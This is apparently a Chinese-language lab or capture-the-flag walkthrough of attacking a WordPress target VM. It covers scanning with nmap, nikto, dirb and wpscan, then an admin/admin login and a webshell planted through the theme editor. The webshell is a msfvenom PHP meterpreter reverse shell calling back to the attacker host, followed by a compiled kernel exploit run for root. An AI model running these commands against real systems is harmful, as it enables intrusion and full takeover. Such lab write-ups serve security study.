1、 扫描靶机信息

nmap -sV 192.168.222.130

image.png

nmap -A -v -T4 192.168.222.130        

image.png

nikto -host 192.168.222.130               //扫描网站目录

image.png

dirb http://192.168.222.130               //扫描关键信息

image.png

由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞;
wpscan -url url -enumerate at -enumerate ap --enumerate u
wordpress基于php的CMS管理系统
wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u

image.png

image.png

image.png

对网页进行弱密码测试

1、192.168.222.128/wordpress/login.php

弱密码
admin     admin登录成功

2、点击Appearance > Editor > 编辑可以上传的webshell

使用msfvenom生成可以接受到msf的回弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php

image.png

上传成功之后访问该404网页

image.png

在msf中接受回弹结果

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp           //设置payload
set lhost 192.168.222.128                    //设置回弹攻击机的IP地址
set lport 4444                                  //设置回弹的端口

image.png

查看该系统的内核版本,进行内核渗透

image.png

sysinfo           查看系统信息
利用searchsploit Linux ubuntu 4.4.0     查看内核版本漏洞的exp

image.png

使用这个exp

gcc 41458.c -o shell      gcc编译完之后输出shell
在meterpreter上传刚才编译好的文件
upload shell

image.png

chmod 777 shell               //给与其最高权限
./shell                       //运行该程序
获得root权限

image.png

image.png